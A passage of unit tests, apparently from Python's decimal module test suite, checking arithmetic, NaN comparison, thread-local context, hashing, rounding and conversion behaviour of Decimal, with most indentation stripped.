self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
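    # Runs in thread 1: its context (prec 24, copied from DefaultContext) must
    # be unaffected by the prec change that thread 2 makes to its own context.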
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
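    # Runs in thread 2: changes its own context's prec to 18 and verifies the
    # change takes effect locally without touching the other thread's context.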
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
    # Take care when executing this test from IDLE: there's an issue in
    # threading that hangs IDLE and it has not been tracked down.
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
@unittest.skipUnless(threading, 'threading required')
class CThreadingTest(ThreadingTest):
decimal = C
@unittest.skipUnless(threading, 'threading required')
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
        self.assertIs(db.__ge__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
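        # Decimals are immutable, so copy.copy() and copy.deepcopy() are free
        # to return the very same object.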
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
        #the same hash as for an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
        # check that the hashes of a Decimal and a float match when they
        # represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
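        # Signaling NaNs have no float equivalent; conversion raises ValueError.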
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
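        # repr() of a Decimal must evaluate back to an equal Decimal.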
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
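        # Passing context=None (or rounding=None) must behave exactly like
        # omitting the argument: the current thread's context is used.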
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
